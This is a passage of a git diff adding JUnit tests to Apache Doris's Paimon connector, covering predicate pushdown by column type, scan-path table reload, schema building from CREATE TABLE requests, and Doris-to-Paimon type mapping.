Assertions.assertFalse(ops.log.contains("listPartitions:db1.t1"), + "unpartitioned tables must not reach the listPartitions seam"); + } + + @Test + public void tableNotExistDuringListYieldsEmpty() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = new FakePaimonTable( + "t1", dtRegionRowType(), Arrays.asList("dt", "region"), Collections.emptyList()); + table.setOptions(Collections.singletonMap("partition.legacy-name", "true")); + ops.table = table; + ops.throwTableNotExist = true; // seam throws TableNotExistException on listPartitions + + List names = metadataWith(ops).listPartitionNames(null, dtRegionHandle(table)); + + // WHY: legacy getPaimonPartitions swallows TableNotExistException and returns empty rather + // than failing the query; the connector must preserve that. MUTATION: removing the catch + // (letting the checked exception propagate) -> the call throws instead of returning empty + // -> red. + Assertions.assertTrue(names.isEmpty()); + Assertions.assertTrue(ops.log.contains("listPartitions:db1.t1"), + "the seam must have been reached (and thrown) before the empty result"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java index c4a807fc6b30f8..904942fdd7724f 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java @@ -43,7 +43,8 @@ public class PaimonConnectorMetadataTest { private static PaimonConnectorMetadata metadataWith(RecordingPaimonCatalogOps ops) { - return new PaimonConnectorMetadata(ops, Collections.emptyMap()); + // Read-path tests ignore the context; a default RecordingConnectorContext is a no-op wrapper. + return new PaimonConnectorMetadata(ops, Collections.emptyMap(), new RecordingConnectorContext()); } private static RowType rowType(String... columnNames) { @@ -207,4 +208,22 @@ public void getColumnHandlesUsesTransientTableWithoutReload() { Assertions.assertTrue(ops.log.isEmpty(), "with a present transient table, no remote getTable reload must happen"); } + + @Test + public void disablesCastPredicatePushdown() { + PaimonConnectorMetadata metadata = + new PaimonConnectorMetadata(null, Collections.emptyMap(), new RecordingConnectorContext()); + + // WHY: the shared converter unwraps CAST shells, so if this returned true (the SPI + // default), a predicate like CAST(str_col AS INT)=5 would be pushed to Paimon as + // str_col="5" and used for file/partition pruning, silently dropping rows like "05"/" 5" + // at the source (BE re-eval cannot recover source-dropped rows). Returning false keeps + // CAST conjuncts BE-only, mirroring MaxCompute/Jdbc. MUTATION: removing the override (or + // flipping it to true) reverts to the default true -> red. The getter touches no instance + // field, so a null ops / null session keeps this offline. + Assertions.assertFalse(metadata.supportsCastPredicatePushdown(null), + "Paimon must disable CAST-predicate pushdown: the converter unwraps CAST shells " + + "and pushing the stripped predicate under-matches at the source, " + + "silently dropping rows BE re-eval cannot recover"); + } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonPredicateConverterTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonPredicateConverterTest.java new file mode 100644 index 00000000000000..5600fd3a93e8a1 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonPredicateConverterTest.java @@ -0,0 +1,145 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.pushdown.ConnectorColumnRef; +import org.apache.doris.connector.api.pushdown.ConnectorComparison; +import org.apache.doris.connector.api.pushdown.ConnectorLiteral; + +import org.apache.paimon.data.Timestamp; +import org.apache.paimon.predicate.LeafPredicate; +import org.apache.paimon.predicate.Predicate; +import org.apache.paimon.types.DataTypes; +import org.apache.paimon.types.RowType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.time.LocalDateTime; +import java.time.ZoneOffset; +import java.util.List; + +/** + * P5-T07 — pins the parity-correct predicate-pushdown contract of + * {@link PaimonPredicateConverter}: NTZ pushes with fixed-UTC semantics (matching legacy + * {@code PaimonValueConverter} and paimon's UTC-interpreted stored stats), while LTZ / FLOAT / + * CHAR are deliberately NOT pushed (left to BE-side filtering) to avoid source-side false pruning. + * + *

    The converter only takes a {@link RowType} — no catalog — so every case is fully offline. + * The paimon {@code DataType} of the column (not the {@link ConnectorType} on the literal) drives + * the conversion, so the literal's connector type is incidental here. + */ +public class PaimonPredicateConverterTest { + + private static final ConnectorType ANY = ConnectorType.of("INT"); + + /** Builds `col = literal` over a single-column RowType of the given paimon type. */ + private static List convertEq( + RowType rowType, String colName, Object literalValue) { + PaimonPredicateConverter converter = new PaimonPredicateConverter(rowType); + ConnectorComparison cmp = new ConnectorComparison( + ConnectorComparison.Operator.EQ, + new ConnectorColumnRef(colName, ANY), + new ConnectorLiteral(ANY, literalValue)); + return converter.convert(cmp); + } + + @Test + public void ntzPushedWithUtcSemantics() { + RowType rowType = RowType.builder().field("ts", DataTypes.TIMESTAMP()).build(); + LocalDateTime literal = LocalDateTime.of(2021, 3, 14, 1, 59, 26); + + List predicates = convertEq(rowType, "ts", literal); + + // WHY: a TIMESTAMP_WITHOUT_TIME_ZONE comparison against a wall-clock literal MUST be + // pushed — dropping it would forfeit all file/partition pruning on NTZ columns. + // MUTATION: returning null for the TIMESTAMP_WITHOUT_TIME_ZONE root -> size 0 -> red. + Assertions.assertEquals(1, predicates.size(), + "an NTZ equality predicate must be pushed (one leaf produced)"); + + // WHY: the pushed literal must be the wall clock interpreted in UTC, because paimon's + // stored min/max stats for a zone-free column are computed by reading the wall clock as + // UTC; any other zone shifts the epoch-millis vs the stored stats and false-prunes files + // (silent data loss). MUTATION: switching ZoneOffset.UTC -> a non-UTC zone (e.g. the + // session zone) shifts this value -> assertion red. + long expectedMillis = literal.toInstant(ZoneOffset.UTC).toEpochMilli(); + LeafPredicate leaf = (LeafPredicate) predicates.get(0); + Assertions.assertEquals(Timestamp.fromEpochMillis(expectedMillis), leaf.literals().get(0), + "NTZ literal must be the wall clock converted via fixed UTC (legacy GMT parity)"); + } + + @Test + public void ltzNotPushed() { + RowType rowType = RowType.builder() + .field("ts", DataTypes.TIMESTAMP_WITH_LOCAL_TIME_ZONE()).build(); + LocalDateTime literal = LocalDateTime.of(2021, 3, 14, 1, 59, 26); + + List predicates = convertEq(rowType, "ts", literal); + + // WHY: legacy never pushed TIMESTAMP WITH LOCAL TIME ZONE (PaimonValueConverter has no + // visit(LocalZonedTimestampType) -> defaultMethod -> null). Pushing it via a fixed zone is + // an instant mismatch under non-UTC sessions, risking false pruning, so the conjunct must + // be dropped and left to BE-side filtering. MUTATION: re-merging the LTZ case into the NTZ + // branch (so it produces a predicate) -> size 1 -> red. + Assertions.assertTrue(predicates.isEmpty(), + "an LTZ predicate must NOT be pushed (dropped to BE-side filtering)"); + } + + @Test + public void floatNotPushed() { + RowType rowType = RowType.builder().field("f", DataTypes.FLOAT()).build(); + + List predicates = convertEq(rowType, "f", 1.5d); + + // WHY: the FLOAT root deliberately returns null (not pushed) — pushing a float literal + // risks precision-mismatch false pruning at the source. MUTATION: returning a value for + // the FLOAT root -> size 1 -> red. + Assertions.assertTrue(predicates.isEmpty(), + "a FLOAT predicate must NOT be pushed"); + } + + @Test + public void charNotPushed() { + RowType rowType = RowType.builder().field("c", DataTypes.CHAR(4)).build(); + + List predicates = convertEq(rowType, "c", "abc"); + + // WHY: the CHAR root deliberately returns null (not pushed) — CHAR's blank-padding + // semantics differ from an unpadded literal, so pushing risks under-matching at the source. + // MUTATION: returning a value for the CHAR root -> size 1 -> red. + Assertions.assertTrue(predicates.isEmpty(), + "a CHAR predicate must NOT be pushed"); + } + + @Test + public void intControlIsPushed() { + RowType rowType = RowType.builder().field("id", DataTypes.INT()).build(); + + List predicates = convertEq(rowType, "id", 42); + + // WHY: control — proves the converter still pushes ordinary predicates and that the + // NTZ/LTZ/FLOAT/CHAR degrade above is type-specific, not a global "drop everything" bug. + // MUTATION: a converter change that drops all conjuncts (e.g. convert() always returning + // empty) would make this red while the negative cases stay green, distinguishing the two. + Assertions.assertEquals(1, predicates.size(), + "an INT equality predicate must still be pushed (degrade is type-specific)"); + LeafPredicate leaf = (LeafPredicate) predicates.get(0); + Assertions.assertEquals(42, leaf.literals().get(0), + "the INT literal must be carried through unchanged"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java new file mode 100644 index 00000000000000..ce61dff9c319f9 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -0,0 +1,101 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.paimon.table.Table; +import org.apache.paimon.types.DataTypes; +import org.apache.paimon.types.RowType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; + +/** + * Tests for {@link PaimonScanPlanProvider#resolveTable}, pinning the transient-Table reload + * fallback on the scan path (P5-T06). The scan path reads the handle's transient Paimon + * {@link Table}, which becomes null after any Java serialization round-trip (cross-node / + * plan-reuse); the reload mirrors the proven fallback in + * {@link PaimonConnectorMetadata#getColumnHandles}. + * + *

    Driven directly against {@code resolveTable} (package-private) rather than {@code planScan} + * end-to-end: {@link FakePaimonTable#newReadBuilder()} throws, so the full scan cannot be driven + * offline. The seam fully covers the remote {@code getTable} call, so each test uses a + * {@link RecordingPaimonCatalogOps} fake and a {@code null} real catalog — entirely offline. + */ +public class PaimonScanPlanProviderTest { + + private static RowType rowType(String... columnNames) { + RowType.Builder builder = RowType.builder(); + for (String name : columnNames) { + builder.field(name, DataTypes.INT()); + } + return builder.build(); + } + + @Test + public void resolveTableReloadsWhenTransientTableNull() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + Table reloaded = new FakePaimonTable( + "t1", + rowType("id", "name"), + Collections.emptyList(), + Collections.emptyList()); + ops.table = reloaded; + // A handle whose transient Table is null (e.g. after serialization across the FE/BE + // boundary or plan reuse) — the scan path must reload via the seam rather than NPE. + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + Assertions.assertNull(handle.getPaimonTable(), "precondition: transient table is null"); + + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops); + Table table = provider.resolveTable(handle); + + // WHY: this is the serde-survival safety net. With a null transient Table, the scan path's + // only way to read rowType()/serialize the table for BE is to re-fetch it from the catalog + // seam. MUTATION: removing the `if (table == null) { table = catalogOps.getTable(id); }` + // block -> returns null -> downstream NPE on table.rowType() -> red. The recorded getTable + // call proves the reload happened. + Assertions.assertSame(reloaded, table, + "scan path must return the table reloaded from the seam when the transient ref is null"); + Assertions.assertTrue(ops.log.contains("getTable:db1.t1"), + "reload-fallback must re-fetch the table from the seam when the transient ref is null"); + } + + @Test + public void resolveTableUsesTransientWithoutReload() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = new FakePaimonTable( + "t1", + rowType("id", "name"), + Collections.emptyList(), + Collections.emptyList()); + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(table); + + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops); + Table resolved = provider.resolveTable(handle); + + // WHY: the fast path — when the transient Table is already present, resolveTable must use it + // and NOT make a redundant remote getTable call. MUTATION: always reloading would record a + // getTable entry -> red. This pins the reload as a fallback, not the default. + Assertions.assertSame(table, resolved); + Assertions.assertTrue(ops.log.isEmpty(), + "with a present transient table, no remote getTable reload must happen"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonSchemaBuilderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonSchemaBuilderTest.java new file mode 100644 index 00000000000000..cb9d63a4e567ca --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonSchemaBuilderTest.java @@ -0,0 +1,196 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.DorisConnectorException; +import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; +import org.apache.doris.connector.api.ddl.ConnectorPartitionField; +import org.apache.doris.connector.api.ddl.ConnectorPartitionSpec; + +import org.apache.paimon.CoreOptions; +import org.apache.paimon.schema.Schema; +import org.apache.paimon.types.DataField; +import org.apache.paimon.types.IntType; +import org.apache.paimon.types.VarCharType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; +import java.util.Collections; +import java.util.LinkedHashMap; +import java.util.Map; + +/** + * P5-T12 — pins {@link PaimonSchemaBuilder#build} to byte-parity with the legacy fe-core + * {@code PaimonMetadataOps.toPaimonSchema}: this is the function that turns a CREATE TABLE + * request into the Paimon {@link Schema} actually persisted, so option/key/comment drift here + * silently changes how new tables are created. + */ +public class PaimonSchemaBuilderTest { + + private static ConnectorColumn col(String name, ConnectorType type, boolean nullable) { + return new ConnectorColumn(name, type, name + " comment", nullable, null); + } + + private static ConnectorCreateTableRequest.Builder baseRequest() { + return ConnectorCreateTableRequest.builder() + .dbName("db") + .tableName("t") + .columns(Arrays.asList( + col("id", ConnectorType.of("INT"), false), + col("name", ConnectorType.of("STRING"), true))); + } + + @Test + public void columnsCarryTypeNameNullabilityAndComment() { + Schema schema = PaimonSchemaBuilder.build(baseRequest().build()); + + // WHY: column name/type/comment and per-column nullability must survive the conversion; + // nullability is applied via copy(nullable), mirroring legacy toPaimontype().copy(...). + // MUTATION: dropping .copy(col.isNullable()) (so both columns share paimon's default + // nullable) or losing the comment turns this red. + DataField id = schema.fields().get(0); + DataField name = schema.fields().get(1); + Assertions.assertEquals("id", id.name()); + Assertions.assertEquals(new IntType(false), id.type(), "non-null column must be copied non-null"); + Assertions.assertEquals("id comment", id.description()); + Assertions.assertEquals("name", name.name()); + Assertions.assertEquals(new VarCharType(VarCharType.MAX_LENGTH).copy(true), name.type(), + "nullable column must keep nullable, STRING -> VarChar(MAX)"); + } + + @Test + public void primaryKeysComeFromPropertiesOnly() { + Map props = new LinkedHashMap<>(); + props.put("primary-key", "id, name"); + Schema schema = PaimonSchemaBuilder.build(baseRequest().properties(props).build()); + + // WHY: primary keys live ONLY in properties["primary-key"], comma-split and trimmed (note + // the space after the comma above). MUTATION: not trimming (" name") or not reading the + // property at all (empty pk list) turns this red. + Assertions.assertEquals(Arrays.asList("id", "name"), schema.primaryKeys()); + } + + @Test + public void noPrimaryKeyPropertyYieldsEmpty() { + Schema schema = PaimonSchemaBuilder.build(baseRequest().build()); + // WHY: absent primary-key property must yield an empty pk list, not a NPE or a stray key. + // MUTATION: defaulting to a non-empty list turns this red. + Assertions.assertTrue(schema.primaryKeys().isEmpty()); + } + + @Test + public void identityPartitionSpecBecomesPartitionKeys() { + ConnectorPartitionSpec spec = new ConnectorPartitionSpec( + ConnectorPartitionSpec.Style.IDENTITY, + Arrays.asList( + new ConnectorPartitionField("name", "identity", Collections.emptyList()), + new ConnectorPartitionField("id", "IDENTITY", Collections.emptyList())), + Collections.emptyList()); + Schema schema = PaimonSchemaBuilder.build(baseRequest().partitionSpec(spec).build()); + + // WHY: identity partition fields map to partition keys by column name, in order, and the + // identity check is case-insensitive. MUTATION: reordering, or rejecting the upper-case + // "IDENTITY", turns this red. + Assertions.assertEquals(Arrays.asList("name", "id"), schema.partitionKeys()); + } + + @Test + public void nullPartitionSpecYieldsNoPartitionKeys() { + Schema schema = PaimonSchemaBuilder.build(baseRequest().build()); + // WHY: a non-partitioned table (null spec) must yield no partition keys. MUTATION: NPE on + // null spec, or inventing partition keys, turns this red. + Assertions.assertTrue(schema.partitionKeys().isEmpty()); + } + + @Test + public void nonIdentityPartitionTransformThrows() { + ConnectorPartitionSpec spec = new ConnectorPartitionSpec( + ConnectorPartitionSpec.Style.TRANSFORM, + Collections.singletonList( + new ConnectorPartitionField("id", "bucket", Collections.singletonList(16))), + Collections.emptyList()); + // WHY: Paimon legacy only supported plain partition columns; a transform (bucket/year/...) + // must fail-fast rather than be silently dropped (which would create a differently + // partitioned table than the user asked for). MUTATION: ignoring the transform and adding + // the column anyway makes this green-when-it-should-throw -> caught here. + Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonSchemaBuilder.build(baseRequest().partitionSpec(spec).build())); + } + + @Test + public void locationRekeyedToCorePathAndStripped() { + Map props = new LinkedHashMap<>(); + props.put("location", "s3://bucket/path"); + props.put("bucket", "4"); + Schema schema = PaimonSchemaBuilder.build(baseRequest().properties(props).build()); + + // WHY: "location" must be removed and re-added under CoreOptions.PATH; unrelated options + // (bucket) ride through unchanged as passthrough (legacy did not consume bucketSpec). + // MUTATION: leaving "location" in options, not setting CoreOptions.PATH, or dropping the + // bucket passthrough turns this red. + Assertions.assertFalse(schema.options().containsKey("location"), + "raw location key must be stripped from options"); + Assertions.assertEquals("s3://bucket/path", schema.options().get(CoreOptions.PATH.key()), + "location must be re-keyed to CoreOptions.PATH"); + Assertions.assertEquals("4", schema.options().get("bucket"), + "unrelated options must ride through as passthrough"); + } + + @Test + public void primaryKeyAndCommentStrippedFromOptions() { + Map props = new LinkedHashMap<>(); + props.put("primary-key", "id"); + props.put("comment", "from properties"); + props.put("custom", "keep"); + Schema schema = PaimonSchemaBuilder.build(baseRequest().properties(props).build()); + + // WHY: "primary-key" and "comment" are control keys consumed into dedicated Schema fields + // and MUST NOT leak into the option map; other keys remain. MUTATION: leaving either key in + // options turns this red. + Assertions.assertFalse(schema.options().containsKey("primary-key")); + Assertions.assertFalse(schema.options().containsKey("comment")); + Assertions.assertEquals("keep", schema.options().get("custom")); + } + + @Test + public void commentPrefersPropertiesOverClause() { + Map props = new LinkedHashMap<>(); + props.put("comment", "from properties"); + Schema schema = PaimonSchemaBuilder.build( + baseRequest().comment("from clause").properties(props).build()); + + // WHY: legacy toPaimonSchema read the table comment ONLY from properties["comment"]; to + // preserve that persisted-comment behavior, properties wins over the dedicated COMMENT + // clause. MUTATION: preferring request.getComment() (the clause) flips this to "from + // clause" -> red. + Assertions.assertEquals("from properties", schema.comment()); + } + + @Test + public void commentFallsBackToClauseWhenPropertyAbsent() { + Schema schema = PaimonSchemaBuilder.build(baseRequest().comment("from clause").build()); + + // WHY: when properties has no "comment", the user's COMMENT clause must not be silently + // dropped (a strictly-legacy reading would lose it). MUTATION: hardcoding null when the + // property is absent (ignoring request.getComment()) turns this red. + Assertions.assertEquals("from clause", schema.comment()); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTypeMappingToPaimonTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTypeMappingToPaimonTest.java new file mode 100644 index 00000000000000..371053bc170199 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonTypeMappingToPaimonTest.java @@ -0,0 +1,184 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.DorisConnectorException; + +import org.apache.paimon.types.ArrayType; +import org.apache.paimon.types.BigIntType; +import org.apache.paimon.types.BooleanType; +import org.apache.paimon.types.DataField; +import org.apache.paimon.types.DataType; +import org.apache.paimon.types.DateType; +import org.apache.paimon.types.DecimalType; +import org.apache.paimon.types.DoubleType; +import org.apache.paimon.types.FloatType; +import org.apache.paimon.types.IntType; +import org.apache.paimon.types.MapType; +import org.apache.paimon.types.RowType; +import org.apache.paimon.types.TimestampType; +import org.apache.paimon.types.VarBinaryType; +import org.apache.paimon.types.VarCharType; +import org.apache.paimon.types.VariantType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; +import java.util.Collections; + +/** + * P5-T11 — pins the Doris->Paimon reverse type mapping in + * {@link PaimonTypeMapping#toPaimonType} to byte-parity with the legacy fe-core + * {@code DorisToPaimonTypeVisitor}. + * + *

    The CREATE TABLE path produces these {@link ConnectorType} descriptors; this mapping is + * what decides the on-disk Paimon column type, so any drift silently changes the physical schema + * of newly created tables.

    + */ +public class PaimonTypeMappingToPaimonTest { + + @Test + public void scalarPrimitivesMapExactly() { + // WHY: the narrow scalar set is the legacy contract; each must produce the exact paimon + // no-arg type. MUTATION: swapping e.g. INT -> BigIntType, or adding precision to a no-arg + // type, changes the persisted column type and turns these red. + Assertions.assertEquals(new BooleanType(), PaimonTypeMapping.toPaimonType(ConnectorType.of("BOOLEAN"))); + Assertions.assertEquals(new IntType(), PaimonTypeMapping.toPaimonType(ConnectorType.of("INT"))); + Assertions.assertEquals(new IntType(), PaimonTypeMapping.toPaimonType(ConnectorType.of("INTEGER"))); + Assertions.assertEquals(new BigIntType(), PaimonTypeMapping.toPaimonType(ConnectorType.of("BIGINT"))); + Assertions.assertEquals(new FloatType(), PaimonTypeMapping.toPaimonType(ConnectorType.of("FLOAT"))); + Assertions.assertEquals(new DoubleType(), PaimonTypeMapping.toPaimonType(ConnectorType.of("DOUBLE"))); + Assertions.assertEquals(new DateType(), PaimonTypeMapping.toPaimonType(ConnectorType.of("DATE"))); + Assertions.assertEquals(new DateType(), PaimonTypeMapping.toPaimonType(ConnectorType.of("DATEV2"))); + Assertions.assertEquals(new VariantType(), PaimonTypeMapping.toPaimonType(ConnectorType.of("VARIANT"))); + } + + @Test + public void charFamilyCollapsesToVarcharMaxDroppingLength() { + // WHY: legacy isCharFamily -> VarCharType(MAX_LENGTH) unconditionally; the declared length + // is intentionally dropped and CHAR is NOT mapped to paimon CharType. MUTATION: honoring + // the declared length (e.g. new VarCharType(10)) or mapping CHAR -> CharType makes these red. + DataType expected = new VarCharType(VarCharType.MAX_LENGTH); + Assertions.assertEquals(expected, PaimonTypeMapping.toPaimonType(ConnectorType.of("CHAR", 10, 0))); + Assertions.assertEquals(expected, PaimonTypeMapping.toPaimonType(ConnectorType.of("VARCHAR", 20, 0))); + Assertions.assertEquals(expected, PaimonTypeMapping.toPaimonType(ConnectorType.of("STRING"))); + } + + @Test + public void datetimeDropsScaleToNoArgTimestamp() { + // WHY: legacy maps DATETIME/DATETIMEV2 -> new TimestampType() (no-arg, precision 6); the + // requested datetime scale is intentionally dropped, and it is a plain timestamp not a + // zoned one. MUTATION: propagating the scale (new TimestampType(scale)) or using + // LocalZonedTimestampType makes this red. + TimestampType expected = new TimestampType(); + Assertions.assertEquals(6, expected.getPrecision(), "no-arg TimestampType must default to precision 6"); + Assertions.assertEquals(expected, + PaimonTypeMapping.toPaimonType(ConnectorType.of("DATETIMEV2", 3, 0)), + "DATETIMEV2(scale 3) must drop the scale -> TimestampType() precision 6"); + Assertions.assertEquals(expected, PaimonTypeMapping.toPaimonType(ConnectorType.of("DATETIME"))); + } + + @Test + public void decimalCarriesPrecisionAndScale() { + // WHY: every decimal family member carries precision/scale through verbatim. MUTATION: + // hardcoding a precision/scale, or swapping the two args, turns this red. + Assertions.assertEquals(new DecimalType(18, 4), + PaimonTypeMapping.toPaimonType(ConnectorType.of("DECIMAL64", 18, 4))); + Assertions.assertEquals(new DecimalType(9, 2), + PaimonTypeMapping.toPaimonType(ConnectorType.of("DECIMAL32", 9, 2))); + Assertions.assertEquals(new DecimalType(27, 9), + PaimonTypeMapping.toPaimonType(ConnectorType.of("DECIMALV2", 27, 9))); + } + + @Test + public void varbinaryMapsToVarBinaryMax() { + // WHY: legacy isVarbinaryType -> VarBinaryType(MAX_LENGTH). MUTATION: honoring a declared + // length or mapping to BinaryType makes this red. + Assertions.assertEquals(new VarBinaryType(VarBinaryType.MAX_LENGTH), + PaimonTypeMapping.toPaimonType(ConnectorType.of("VARBINARY", 16, 0))); + } + + @Test + public void arrayRecursesElement() { + // WHY: ARRAY must wrap the recursively mapped element. MUTATION: dropping the recursion + // (e.g. wrapping a raw VarChar) or losing the element type makes this red. + Assertions.assertEquals(new ArrayType(new IntType()), + PaimonTypeMapping.toPaimonType(ConnectorType.arrayOf(ConnectorType.of("INT")))); + } + + @Test + public void mapForcesNonNullKey() { + // WHY: legacy MAP forces the key non-null via keyResult.copy(false) while the value keeps + // the paimon default (nullable). This is part of the type structure, not column nullability. + // MUTATION: dropping the .copy(false) on the key (so the key is nullable) makes this red. + DataType actual = PaimonTypeMapping.toPaimonType( + ConnectorType.mapOf(ConnectorType.of("STRING"), ConnectorType.of("INT"))); + MapType expected = new MapType( + new VarCharType(VarCharType.MAX_LENGTH).copy(false), new IntType()); + Assertions.assertEquals(expected, actual); + Assertions.assertFalse(((MapType) actual).getKeyType().isNullable(), + "the map key type must be non-null (legacy .copy(false) parity)"); + } + + @Test + public void structBuildsSequentialFieldIdsAndNames() { + // WHY: STRUCT must build DataFields with sequential ids 0,1,... (legacy AtomicInteger(-1) + // incrementAndGet) and names from getFieldNames, recursing each field type. MUTATION: a + // wrong starting id (e.g. 1), reused ids, or losing a field name turns this red. + ConnectorType struct = ConnectorType.structOf( + Arrays.asList("a", "b"), + Arrays.asList(ConnectorType.of("INT"), ConnectorType.of("STRING"))); + RowType row = (RowType) PaimonTypeMapping.toPaimonType(struct); + + DataField f0 = new DataField(0, "a", new IntType()); + DataField f1 = new DataField(1, "b", new VarCharType(VarCharType.MAX_LENGTH)); + Assertions.assertEquals(new RowType(Arrays.asList(f0, f1)), row); + Assertions.assertEquals(0, row.getFields().get(0).id(), "first struct field id must be 0"); + Assertions.assertEquals(1, row.getFields().get(1).id(), "second struct field id must be 1"); + } + + @Test + public void unsupportedScalarTypesThrow() { + // WHY: the legacy visitor had no branch for these and threw; the connector preserves that + // gap by throwing DorisConnectorException rather than inventing a mapping. MUTATION: adding + // a TINYINT/SMALLINT/LARGEINT/TIME/TIMESTAMPTZ branch (silently widening support) would + // make the corresponding assertion red. + for (String unsupported : new String[] {"TINYINT", "SMALLINT", "LARGEINT", "TIMEV2", "TIMESTAMPTZ"}) { + Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonTypeMapping.toPaimonType(ConnectorType.of(unsupported)), + unsupported + " must throw (legacy gap preserved)"); + } + } + + @Test + public void nestedUnsupportedTypePropagatesThrow() { + // WHY: an unsupported element nested inside a complex type must still fail-fast, proving the + // throw is reached through the recursion (not swallowed). MUTATION: catching/degrading the + // nested throw inside array/map/struct handling would make this red. + ConnectorType arrayOfTinyint = ConnectorType.arrayOf(ConnectorType.of("TINYINT")); + Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonTypeMapping.toPaimonType(arrayOfTinyint)); + + ConnectorType structWithBadField = ConnectorType.structOf( + Collections.singletonList("x"), + Collections.singletonList(ConnectorType.of("JSON"))); + Assertions.assertThrows(DorisConnectorException.class, + () -> PaimonTypeMapping.toPaimonType(structWithBadField)); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java new file mode 100644 index 00000000000000..4ad37567015e16 --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingConnectorContext.java @@ -0,0 +1,58 @@ +// Licensed to the Apache Software Foundation (ASF) under 